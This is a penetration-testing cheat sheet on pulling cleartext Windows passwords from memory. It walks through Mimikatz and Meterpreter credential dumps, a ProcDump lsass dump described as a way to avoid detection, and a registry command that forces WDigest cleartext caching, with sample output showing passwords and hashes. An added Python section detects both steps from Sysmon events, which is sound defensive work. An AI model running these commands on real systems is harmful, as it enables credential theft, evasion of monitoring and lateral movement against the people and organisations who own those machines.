Retrieve Windows passwords
This page deals with retrieving Windows cleartext credentials from memory and via WDigest.
Introduction
Retrieving Windows cleartext passwords allows an attacker to test for password reuse, move laterally, gain a foothold on a domain, etc.
Retrieve clear text passwords from memory
Windows historically stored cleartext passwords in RAM, inside the lsass process. This allows users with admin privileges to dump cleartext passwords from memory with tools like Mimikatz, WCE, etc.
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
[...]
If you use Meterpreter on Win10 / Win2016, the only thing that works is the Kiwi WDigest module.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.1.1 20170608 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */
Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN01$ WORKGROUP (null)
localadmin WIN01 L0c4l4dm1n
Minidump
To avoid being detected during assessments, we can use the Minidump technique.
It consists of dumping the lsass process on the target computer with a legitimate tool (ProcDump by Sysinternals), then parsing the dump with Mimikatz locally on the attacker machine to retrieve the passwords.
On the target machine:
C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp
ProcDump v5.14 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ...
Writing 48MB. Estimated time (less than) 1 second.
Dump written.
To successfully extract passwords from this dump, copy it to a machine with the same major Windows version and the same architecture as the victim machine.

Then use Mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 141237
User Name : sekur_000
Domain : WINDOWS-8
msv :
* Username : sekurlsa@live.fr
* Domain : MicrosoftAccount
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
tspkg :
* Username : sekurlsa@live.fr
* Domain : MicrosoftAccount
* Password : waza1234/
wdigest :
* Username : sekurlsa@live.fr
* Domain : MicrosoftAccount
* Password : waza1234/
Since Mimikatz Nostalgia (2019/05/04), you can parse any dump regardless of Windows version/architecture.
WDigest
You can force Windows to store cleartext credentials in memory simply by modifying the value of the WDigest registry key. Cleartext passwords will be cached again the next time users log on.
To enable it, set the value to 1:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
To disable it, set the value to 0:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 0
For the change to take effect, the following conditions apply:
Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
Enabling requires a lock
Disabling requires a sign-out
Win10:
Enabling requires a sign-out
Disabling requires a sign-out
Win2016:
Enabling requires a lock
Disabling requires a reboot
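The two steps described above, setting UseLogonCredential and dumping lsass with ProcDump, are also the two indicators a defender watches for. The following is an added example, not code from the original page, that checks Sysmon-style event records for both: Event ID 13 (registry value set) on the WDigest key and Event ID 10 (ProcessAccess) on lsass.exe. The event records and the allowlist of images that may legitimately open lsass are constructed for this example and must be tuned per environment.

```python
"""Flag WDigest cleartext caching being enabled (Sysmon Event ID 13) and non-allowlisted
processes opening lsass.exe (Sysmon Event ID 10). Field names follow Sysmon's schema;
the sample records at the bottom are constructed for this example."""
import re

WDIGEST_KEY = r"\SecurityProviders\WDigest\UseLogonCredential"
# Images that routinely open lsass on a typical host (assumption; tune per environment).
LSASS_ALLOWLIST = {r"c:\windows\system32\svchost.exe", r"c:\windows\system32\wininit.exe"}

def wdigest_enabled(event):
    """True when an ID 13 event sets UseLogonCredential to a non-zero DWORD."""
    if event.get("EventID") != 13:
        return False
    if not event.get("TargetObject", "").lower().endswith(WDIGEST_KEY.lower()):
        return False
    # Sysmon renders DWORD values as "DWORD (0x00000001)".
    m = re.search(r"DWORD \(0x([0-9a-f]{8})\)", event.get("Details", ""), re.I)
    return bool(m) and int(m.group(1), 16) != 0

def suspicious_lsass_access(event):
    """True when an ID 10 event shows a non-allowlisted image opening lsass.exe."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    return event.get("SourceImage", "").lower() not in LSASS_ALLOWLIST

def triage(events):
    """Return (rule, offending image) findings for a list of event records."""
    findings = []
    for ev in events:
        if wdigest_enabled(ev):
            findings.append(("wdigest_cleartext_enabled", ev.get("Image", "")))
        if suspicious_lsass_access(ev):
            findings.append(("lsass_handle_opened", ev.get("SourceImage", "")))
    return findings

# Constructed sample events mirroring the reg add and procdump steps on this page.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Sysinternals\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"[!] {rule}: {image}")
```

Setting the value back to 0 (the second record) is deliberately not flagged, so the rule fires only on the transition that re-enables cleartext caching.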
Lock, sign out, and reboot from CMD
To lock a session, type:
rundll32.exe user32.dll,LockWorkStation
To sign out, type:
query session
logoff <sessionToClose_Number>
To reboot, type:
shutdown /r /t 0